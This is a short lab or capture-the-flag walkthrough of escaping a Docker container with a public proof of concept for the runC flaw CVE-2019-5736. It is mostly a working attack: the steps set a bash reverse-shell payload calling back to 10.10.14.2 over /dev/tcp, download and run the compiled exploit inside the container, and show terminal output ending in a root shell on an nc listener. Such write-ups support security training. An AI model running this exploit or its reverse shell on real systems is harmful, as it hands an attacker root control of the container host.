5 privesc docker runC exploit

Using https://github.com/Frichetten/CVE-2019-5736-PoC

The vulnerability allows a malicious container to overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command.

1. Update payload in the main.go;

2. var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.2/443 0>&1"

3. compile it with go build main.go.

4. Move that binary to the container you'd like to escape from.

5. Execute the binary, and then the next time someone attaches to it and calls /bin/sh your payload will fire.

go build main.go

<start a python-server>
<start-nc-listener>

Terminal-1

sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
oot@0f4c2517af40:/opt/webapp# wget 10.10.14.2/main
root@0f4c2517af40:/opt/webapp# chmod +x main
root@0f4c2517af40:/opt/webapp# ./main
[+] Overwritten /bin/sh successfully

<START TERMINAL-2 COMMAND>
[+] Found the PID: 2453
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc00033e060}

Terminal-2

No help topic for '/bin/sh'

NC Listener

$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.230] 42568
bash: cannot set terminal process group (1632): Inappropriate ioctl for device
bash: no job control in this shell
<4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# whoami
whoami
root

Reading Material:

• https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736